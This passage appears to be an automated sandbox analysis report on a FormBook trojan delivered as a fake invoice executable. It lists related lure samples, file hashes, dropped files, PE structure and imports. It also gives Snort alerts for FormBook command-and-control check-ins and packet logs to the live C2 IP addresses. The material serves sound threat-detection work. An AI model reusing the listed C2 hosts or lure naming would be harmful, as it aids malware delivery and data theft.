                                                            b7cgnOpObK.exeGet hashmaliciousBrowse
                                                            • 104.21.19.200
                                                            Invoice 8-6-2021.exeGet hashmaliciousBrowse
                                                            • 172.67.188.154
                                                            PO187439.exeGet hashmaliciousBrowse
                                                            • 104.21.81.138
                                                            090009000000090.exeGet hashmaliciousBrowse
                                                            • 104.21.19.200
                                                            Urgent Contract Order GH78566484,pdf.exeGet hashmaliciousBrowse
                                                            • 172.67.188.154
                                                            NEWORDERLIST.exeGet hashmaliciousBrowse
                                                            • 104.21.47.38
                                                            Nr_0052801.exeGet hashmaliciousBrowse
                                                            • 172.67.158.27
                                                            Check 57549.HtmlGet hashmaliciousBrowse
                                                            • 104.16.19.94
                                                            Invoice_OS169ENG 000003893148.exeGet hashmaliciousBrowse
                                                            • 104.21.19.200
                                                            PO.xlsxGet hashmaliciousBrowse
                                                            • 104.23.98.190
                                                            sat1_0609_2.dllGet hashmaliciousBrowse
                                                            • 104.20.184.68
                                                            Lista e porosive.exeGet hashmaliciousBrowse
                                                            • 162.159.129.233
                                                            00404000004.exeGet hashmaliciousBrowse
                                                            • 172.67.188.154
                                                            HENGTONG-IDC-LLCUSPayment receipt MT103.exeGet hashmaliciousBrowse
                                                            • 146.148.195.215
                                                            000987654345XASD.exeGet hashmaliciousBrowse
                                                            • 216.12.171.50
                                                            Bidding of BMP Project EMMP.99876786.exeGet hashmaliciousBrowse
                                                            • 104.232.96.207
                                                            RFQ - Upgrade Project (PML) 0000052021.exeGet hashmaliciousBrowse
                                                            • 104.232.96.207
                                                            DHL_119045_Receipt document,pdf.exeGet hashmaliciousBrowse
                                                            • 172.87.193.139
                                                            nK8YtaS7db.exeGet hashmaliciousBrowse
                                                            • 146.148.189.230
                                                            pVrqrGltiL.exeGet hashmaliciousBrowse
                                                            • 104.232.64.103
                                                            Proforma Fatura INV98767894.PDF.exeGet hashmaliciousBrowse
                                                            • 107.178.171.41
                                                            GE3hVNHtrK.exeGet hashmaliciousBrowse
                                                            • 104.232.64.103
                                                            PI.exeGet hashmaliciousBrowse
                                                            • 146.148.146.34
                                                            SWIFT COPY.exeGet hashmaliciousBrowse
                                                            • 146.148.146.34
                                                            Bank Details.xlsxGet hashmaliciousBrowse
                                                            • 104.128.125.95
                                                            PROFORMA INVOICE.exeGet hashmaliciousBrowse
                                                            • 103.4.20.241
                                                            dot.dotGet hashmaliciousBrowse
                                                            • 203.76.236.103
                                                            eQLPRPErea.exeGet hashmaliciousBrowse
                                                            • 104.128.125.95
                                                            FTT103634332.exeGet hashmaliciousBrowse
                                                            • 104.128.126.123
                                                            ARBmDNJS7m.exeGet hashmaliciousBrowse
                                                            • 104.128.125.95
                                                            Purchase Order 2021 - 00041.exeGet hashmaliciousBrowse
                                                            • 104.232.96.254
                                                            New order.exeGet hashmaliciousBrowse
                                                            • 104.232.96.254
                                                            SWIFT_png.exeGet hashmaliciousBrowse
                                                            • 220.158.226.143

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            C:\Users\user\AppData\Local\Temp\nsp24F7.tmp\System.dllProforma Invoice and Bank swift-REG.PI-0086547654.exeGet hashmaliciousBrowse
                                                              3arZKnr21W.exeGet hashmaliciousBrowse
                                                                Shipping receipt.exeGet hashmaliciousBrowse
                                                                  New Order TL273723734533.pdf.exeGet hashmaliciousBrowse
                                                                    YZ8OvkljWm.exeGet hashmaliciousBrowse
                                                                      U03c2doc.exeGet hashmaliciousBrowse
                                                                        QUOTE061021.exeGet hashmaliciousBrowse
                                                                          PAYMENT CONFIRMATION.exeGet hashmaliciousBrowse
                                                                            PO187439.exeGet hashmaliciousBrowse
                                                                              090009000000090.exeGet hashmaliciousBrowse
                                                                                NEWORDERLIST.exeGet hashmaliciousBrowse
                                                                                  00404000004.exeGet hashmaliciousBrowse
                                                                                    40900900090000.exeGet hashmaliciousBrowse
                                                                                      INVO090090202.exeGet hashmaliciousBrowse
                                                                                        SecuriteInfo.com.W32.Injector.AIC.genEldorado.29599.exeGet hashmaliciousBrowse
                                                                                          D1E3656B4E1C609B2540CFF74F59319A52D7FABF4CC51.exeGet hashmaliciousBrowse
                                                                                            D1E3656B4E1C609B2540CFF74F59319A52D7FABF4CC51.exeGet hashmaliciousBrowse
                                                                                              SecuriteInfo.com.Variant.Bulz.383129.23206.exeGet hashmaliciousBrowse
                                                                                                SecuriteInfo.com.Variant.Bulz.383129.29566.exeGet hashmaliciousBrowse
                                                                                                  ASAI-LiveCage-Client-Full_Installer-NSS-B-1.5.2.0005 (1).exeGet hashmaliciousBrowse

                                                                                                    Created / dropped Files

                                                                                                    C:\Users\user\AppData\Local\Temp\6jlp0t221b5inmotwb6
                                                                                                    Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):164352
                                                                                                    Entropy (8bit):7.998758173527995
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:QT5c8TmXd3cHrOEnBjJYnX/3VOe6PbETLuf3wKW/Hic0bFaj24k9p1C:QT4tcHrnjJGvFOpoT4W/fVip8
                                                                                                    MD5:B0D1F8FE2661BB67EAE722EF05BB2EA6
                                                                                                    SHA1:63478D37EF57D85F0CC92FCBBB3680EEC90FB384
                                                                                                    SHA-256:02ECBE9DFAACA44A385946BF2A10AB675CD3AC64E66811D1333A9EBCBB728A4F
                                                                                                    SHA-512:318172A5D104A9C782D1CCC81F09A67241E85E2EF9E8B2F76661E977DC61B85E373593B4CC3F2BFFC963CC5D98C44BA399197F1E40391FB4513AD718884C2683
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ./f.t.L.['.3...._2.q.".4.H.#..Nn..J...^Z.wn..f..&...w-..NH`.S.Q.?.v..o...40........o.c...oxy.Z#.(XD.....H8..4.!f...,.B..ok..g..Fq.z..n..)ap.e......7.d.8<.....IB.{...Hkq~..a.\..8.h9.. .4c....+K..$.....M....k..}V.z.8.;..b..P.6....M.....4.Lu.Ifx.e.=wV...q.=i...g..)~W.ca.-..........23.....B.......m..!h.......y...r.@........9G.;m.p<......Yy.j._...W...[.S./.......TU.4....L.}._%j..eW.h...u/-..GT..}.Q..W.h...=4.s..x..j..zU....*...........,s&..<V>...(.`Xx..x....-3..o.\.Z|M/.Q+,.~........4.........(hY.O;...p.F...~...).L.....'M.g.@..b...u........{....s.....I......QX..[...i..x..f.J.......$.?*.q.-e*..U.y......f..h..2'....1...dJT.._.a...K.c...{.@......id..b..p;..~...........lZ7E..K.e...q...S.....?[......o...9NSx,../..\...B...n.B....T..4...-.......I..L&-.^...........l9...L....fj.G..V........8..<C.L.X....+J..L2...A..@D...`?........)...o..f`...~4.`...T.zH..Y...z]..}=..P..t.[.:.:m.6..r.D...4.8.......6.X.a......+.]..pc@.1..q.<.g..K._..L...rF...
                                                                                                    C:\Users\user\AppData\Local\Temp\dceotuvjnitpz
                                                                                                    Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):56977
                                                                                                    Entropy (8bit):4.980974364016973
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:kpYDj6sp0NqCBljcLGbeeqr8uXKZnH/E/pl7f3tsfLvE:ScfOQLGbzqb6ZfEP3F
                                                                                                    MD5:EA1030174F35B4071E9655765BDEE0A7
                                                                                                    SHA1:E1DA533CAD9DD79A6CA5567840631492B546FAF1
                                                                                                    SHA-256:EA9A33E85D080A56D1242F112240E1396C45149913A7CBFED0132E0BA171561A
                                                                                                    SHA-512:2DE92DBD68B66527981E28ACCCA0C01676C35A5CCF951A0B429799DBE1BBDEFF86931D3E211891D2EC1A44D19132D45E10ADEC6A56D122BABFFDBF64C540A909
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: U.......S........b...........%....... .....!.....".....#...a.$...v.%...3.&.....'.....(.....).....*...a.+.....,...a.-.........../.....0.....1.....2.....3...Q.4.....5...4.6.....7...=.8...%.9.....:.....;.....<.....=.....>...A.?.....@.....A...5.B.....C.....D...=.E.....F...I.G.....H.....I.....J...5.K...W.L.....M.....N.....O.....P...5.Q.....R.....S.....T...5.U.....V.....W...=.X.....Y.....Z.....[...=.\.....].....^...4._.....`...U.a.....b.....c.....d.....e.....f...~.g.....h.....i.....j.....k.....l.....m...Y.n.....o.....p...U.q.....r...I.s.....t.....u.....v...Y.w...W.x.....y.....z.....{.....|...Y.}.....~...............Y.................U.......................U.................4...............................................~.....y.................................................................I.............................W..............................
                                                                                                    C:\Users\user\AppData\Local\Temp\nsp24F6.tmp
                                                                                                    Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):254631
                                                                                                    Entropy (8bit):7.4186917232920075
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:6GpT4tcHrnjJGvFOpoT4W/fVipc4dL9bRP4t:b4tcLjJG9OpoT4W/fViDdpb58
                                                                                                    MD5:6805AECB719838AC09004E2E0655BDED
                                                                                                    SHA1:5D1F4A1429C20E9105F1800B13E558022FD15294
                                                                                                    SHA-256:A764168E4B558D726EF4AAC92AF20367FB229F7B42AECE6EAB191B4208B5E61B
                                                                                                    SHA-512:4784DB4AA246735148204058EF8F0108E1FB3D49BFDF76CCC15A56E2251E43F54FECFA53C7338F15E9DAF5EA16F53A3A79A5A01DDE95403E395C5F95062D952F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .T......,.......................T=...... S.......S..........................................................................................................................................................................................................................................J...................j...............................................................................................................................|.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    C:\Users\user\AppData\Local\Temp\nsp24F7.tmp\System.dll
                                                                                                    Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11776
                                                                                                    Entropy (8bit):5.855045165595541
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                                    MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                                    SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                                    SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                                    SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious, Browse
                                                                                                    • Filename: 3arZKnr21W.exe, Detection: malicious, Browse
                                                                                                    • Filename: Shipping receipt.exe, Detection: malicious, Browse
                                                                                                    • Filename: New Order TL273723734533.pdf.exe, Detection: malicious, Browse
                                                                                                    • Filename: YZ8OvkljWm.exe, Detection: malicious, Browse
                                                                                                    • Filename: U03c2doc.exe, Detection: malicious, Browse
                                                                                                    • Filename: QUOTE061021.exe, Detection: malicious, Browse
                                                                                                    • Filename: PAYMENT CONFIRMATION.exe, Detection: malicious, Browse
                                                                                                    • Filename: PO187439.exe, Detection: malicious, Browse
                                                                                                    • Filename: 090009000000090.exe, Detection: malicious, Browse
                                                                                                    • Filename: NEWORDERLIST.exe, Detection: malicious, Browse
                                                                                                    • Filename: 00404000004.exe, Detection: malicious, Browse
                                                                                                    • Filename: 40900900090000.exe, Detection: malicious, Browse
                                                                                                    • Filename: INVO090090202.exe, Detection: malicious, Browse
                                                                                                    • Filename: SecuriteInfo.com.W32.Injector.AIC.genEldorado.29599.exe, Detection: malicious, Browse
                                                                                                    • Filename: D1E3656B4E1C609B2540CFF74F59319A52D7FABF4CC51.exe, Detection: malicious, Browse
                                                                                                    • Filename: D1E3656B4E1C609B2540CFF74F59319A52D7FABF4CC51.exe, Detection: malicious, Browse
                                                                                                    • Filename: SecuriteInfo.com.Variant.Bulz.383129.23206.exe, Detection: malicious, Browse
                                                                                                    • Filename: SecuriteInfo.com.Variant.Bulz.383129.29566.exe, Detection: malicious, Browse
                                                                                                    • Filename: ASAI-LiveCage-Client-Full_Installer-NSS-B-1.5.2.0005 (1).exe, Detection: malicious, Browse
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    Static File Info

                                                                                                    General

                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                    Entropy (8bit):7.912934279663738
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                    • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                    File name:Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                                                                    File size:223620
                                                                                                    MD5:b148ae414eb8a1b34a15cdb32c21f9ee
                                                                                                    SHA1:25b78f76010cc34843352c78d4f8e07a28b46b32
                                                                                                    SHA256:193788545c12c697fe660e9dd178e5d97478d5b90d5b0096f1cd6a9b641d48e9
                                                                                                    SHA512:9f6efbfdd1ab7bed6e0efcff882fd05816c0cbb6b413abce562f1ab6c8adbfa2d86610299be8d399ba36a305b64cadc762806eaa4c647d9b04fd457ec1537d0a
                                                                                                    SSDEEP:6144:Ds9G4RsUIfpwRmZfqJxbx3jjTQeGYWAaE:yG45IfpTIxV3jHQeGYn
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\.........

                                                                                                    File Icon

                                                                                                    Icon Hash:b2a88c96b2ca6a72

                                                                                                    Static PE Info

                                                                                                    General

                                                                                                    Entrypoint:0x40323c
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x4B1AE3C6 [Sat Dec 5 22:50:46 2009 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:4
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:4
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:4
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:099c0646ea7282d232219f8807883be0

                                                                                                    Entrypoint Preview

                                                                                                    Instruction
                                                                                                    sub esp, 00000180h
                                                                                                    push ebx
                                                                                                    push ebp
                                                                                                    push esi
                                                                                                    xor ebx, ebx
                                                                                                    push edi
                                                                                                    mov dword ptr [esp+18h], ebx
                                                                                                    mov dword ptr [esp+10h], 00409130h
                                                                                                    xor esi, esi
                                                                                                    mov byte ptr [esp+14h], 00000020h
                                                                                                    call dword ptr [00407030h]
                                                                                                    push 00008001h
                                                                                                    call dword ptr [004070B4h]
                                                                                                    push ebx
                                                                                                    call dword ptr [0040727Ch]
                                                                                                    push 00000008h
                                                                                                    mov dword ptr [00423F58h], eax
                                                                                                    call 00007F2D70A73B1Eh
                                                                                                    mov dword ptr [00423EA4h], eax
                                                                                                    push ebx
                                                                                                    lea eax, dword ptr [esp+34h]
                                                                                                    push 00000160h
                                                                                                    push eax
                                                                                                    push ebx
                                                                                                    push 0041F458h
                                                                                                    call dword ptr [00407158h]
                                                                                                    push 004091B8h
                                                                                                    push 004236A0h
                                                                                                    call 00007F2D70A737D1h
                                                                                                    call dword ptr [004070B0h]
                                                                                                    mov edi, 00429000h
                                                                                                    push eax
                                                                                                    push edi
                                                                                                    call 00007F2D70A737BFh
                                                                                                    push ebx
                                                                                                    call dword ptr [0040710Ch]
                                                                                                    cmp byte ptr [00429000h], 00000022h
                                                                                                    mov dword ptr [00423EA0h], eax
                                                                                                    mov eax, edi
                                                                                                    jne 00007F2D70A70F1Ch
                                                                                                    mov byte ptr [esp+14h], 00000022h
                                                                                                    mov eax, 00429001h
                                                                                                    push dword ptr [esp+14h]
                                                                                                    push eax
                                                                                                    call 00007F2D70A732B2h
                                                                                                    push eax
                                                                                                    call dword ptr [0040721Ch]
                                                                                                    mov dword ptr [esp+1Ch], eax
                                                                                                    jmp 00007F2D70A70F75h
                                                                                                    cmp cl, 00000020h
                                                                                                    jne 00007F2D70A70F18h
                                                                                                    inc eax
                                                                                                    cmp byte ptr [eax], 00000020h
                                                                                                    je 00007F2D70A70F0Ch
                                                                                                    cmp byte ptr [eax], 00000022h
                                                                                                    mov byte ptr [eax+eax+00h], 00000000h

                                                                                                    Rich Headers

                                                                                                    Programming Language:
                                                                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                    Data Directories

                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x9e0.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                    Sections

                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    .text0x10000x5a5a0x5c00False0.660453464674data6.41769823686IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                    .rdata0x70000x11900x1200False0.4453125data5.18162709925IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .data0x90000x1af980x400False0.55859375data4.70902740305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                    .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .rsrc0x2c0000x9e00xa00False0.45625data4.51012867721IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                    Resources

                                                                                                    NameRVASizeTypeLanguageCountry
                                                                                                    RT_ICON0x2c1900x2e8dataEnglishUnited States
                                                                                                    RT_DIALOG0x2c4780x100dataEnglishUnited States
                                                                                                    RT_DIALOG0x2c5780x11cdataEnglishUnited States
                                                                                                    RT_DIALOG0x2c6980x60dataEnglishUnited States
                                                                                                    RT_GROUP_ICON0x2c6f80x14dataEnglishUnited States
                                                                                                    RT_MANIFEST0x2c7100x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                    Imports

                                                                                                    DLLImport
                                                                                                    KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                                                                                                    USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                                                    GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                                                    SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                                                    ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                                                    COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                    ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                    VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                                    Possible Origin

                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                    EnglishUnited States

                                                                                                    Network Behavior

                                                                                                    Snort IDS Alerts

                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                    06/10/21-14:36:44.390894TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975780192.168.2.4121.254.178.252
                                                                                                    06/10/21-14:36:44.390894TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975780192.168.2.4121.254.178.252
                                                                                                    06/10/21-14:36:44.390894TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975780192.168.2.4121.254.178.252
                                                                                                    06/10/21-14:36:54.972333TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975880192.168.2.485.159.66.93
                                                                                                    06/10/21-14:36:54.972333TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975880192.168.2.485.159.66.93
                                                                                                    06/10/21-14:36:54.972333TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975880192.168.2.485.159.66.93
                                                                                                    06/10/21-14:37:10.805521TCP1201ATTACK-RESPONSES 403 Forbidden804976023.227.38.74192.168.2.4
                                                                                                    06/10/21-14:37:27.645237TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976480192.168.2.435.205.61.67
                                                                                                    06/10/21-14:37:27.645237TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976480192.168.2.435.205.61.67
                                                                                                    06/10/21-14:37:27.645237TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976480192.168.2.435.205.61.67
                                                                                                    06/10/21-14:37:33.101150TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976580192.168.2.437.48.65.148
                                                                                                    06/10/21-14:37:33.101150TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976580192.168.2.437.48.65.148
                                                                                                    06/10/21-14:37:33.101150TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976580192.168.2.437.48.65.148

                                                                                                    Network Port Distribution

                                                                                                    TCP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Jun 10, 2021 14:36:38.054233074 CEST4975680192.168.2.4104.232.96.207
                                                                                                    Jun 10, 2021 14:36:38.250670910 CEST8049756104.232.96.207192.168.2.4
                                                                                                    Jun 10, 2021 14:36:38.250874996 CEST4975680192.168.2.4104.232.96.207
                                                                                                    Jun 10, 2021 14:36:38.251010895 CEST4975680192.168.2.4104.232.96.207
                                                                                                    Jun 10, 2021 14:36:38.752846003 CEST4975680192.168.2.4104.232.96.207
                                                                                                    Jun 10, 2021 14:36:38.846438885 CEST4975680192.168.2.4104.232.96.207
                                                                                                    Jun 10, 2021 14:36:38.965590954 CEST8049756104.232.96.207192.168.2.4
                                                                                                    Jun 10, 2021 14:36:39.060780048 CEST8049756104.232.96.207192.168.2.4
                                                                                                    Jun 10, 2021 14:36:39.060854912 CEST8049756104.232.96.207192.168.2.4
                                                                                                    Jun 10, 2021 14:36:39.060895920 CEST8049756104.232.96.207192.168.2.4
                                                                                                    Jun 10, 2021 14:36:39.060935020 CEST8049756104.232.96.207192.168.2.4
                                                                                                    Jun 10, 2021 14:36:39.060966015 CEST8049756104.232.96.207192.168.2.4
                                                                                                    Jun 10, 2021 14:36:39.061037064 CEST4975680192.168.2.4104.232.96.207
                                                                                                    Jun 10, 2021 14:36:39.061108112 CEST4975680192.168.2.4104.232.96.207
                                                                                                    Jun 10, 2021 14:36:39.061115026 CEST4975680192.168.2.4104.232.96.207
                                                                                                    Jun 10, 2021 14:36:39.061120033 CEST4975680192.168.2.4104.232.96.207
                                                                                                    Jun 10, 2021 14:36:39.061125040 CEST4975680192.168.2.4104.232.96.207
                                                                                                    Jun 10, 2021 14:36:44.118053913 CEST4975780192.168.2.4121.254.178.252
                                                                                                    Jun 10, 2021 14:36:44.390425920 CEST8049757121.254.178.252192.168.2.4
                                                                                                    Jun 10, 2021 14:36:44.390620947 CEST4975780192.168.2.4121.254.178.252
                                                                                                    Jun 10, 2021 14:36:44.390893936 CEST4975780192.168.2.4121.254.178.252
                                                                                                    Jun 10, 2021 14:36:44.662385941 CEST8049757121.254.178.252192.168.2.4
                                                                                                    Jun 10, 2021 14:36:44.664067984 CEST8049757121.254.178.252192.168.2.4
                                                                                                    Jun 10, 2021 14:36:44.664097071 CEST8049757121.254.178.252192.168.2.4
                                                                                                    Jun 10, 2021 14:36:44.664256096 CEST4975780192.168.2.4121.254.178.252
                                                                                                    Jun 10, 2021 14:36:44.664313078 CEST4975780192.168.2.4121.254.178.252
                                                                                                    Jun 10, 2021 14:36:44.935009956 CEST8049757121.254.178.252192.168.2.4
                                                                                                    Jun 10, 2021 14:36:54.897469044 CEST4975880192.168.2.485.159.66.93
                                                                                                    Jun 10, 2021 14:36:54.971858025 CEST804975885.159.66.93192.168.2.4
                                                                                                    Jun 10, 2021 14:36:54.972150087 CEST4975880192.168.2.485.159.66.93
                                                                                                    Jun 10, 2021 14:36:54.972332954 CEST4975880192.168.2.485.159.66.93
                                                                                                    Jun 10, 2021 14:36:55.049076080 CEST804975885.159.66.93192.168.2.4
                                                                                                    Jun 10, 2021 14:36:55.049115896 CEST804975885.159.66.93192.168.2.4
                                                                                                    Jun 10, 2021 14:36:55.049320936 CEST4975880192.168.2.485.159.66.93
                                                                                                    Jun 10, 2021 14:36:55.049495935 CEST4975880192.168.2.485.159.66.93
                                                                                                    Jun 10, 2021 14:36:55.124811888 CEST804975885.159.66.93192.168.2.4
                                                                                                    Jun 10, 2021 14:37:05.140222073 CEST4975980192.168.2.4162.0.229.108
                                                                                                    Jun 10, 2021 14:37:05.328459024 CEST8049759162.0.229.108192.168.2.4
                                                                                                    Jun 10, 2021 14:37:05.328600883 CEST4975980192.168.2.4162.0.229.108
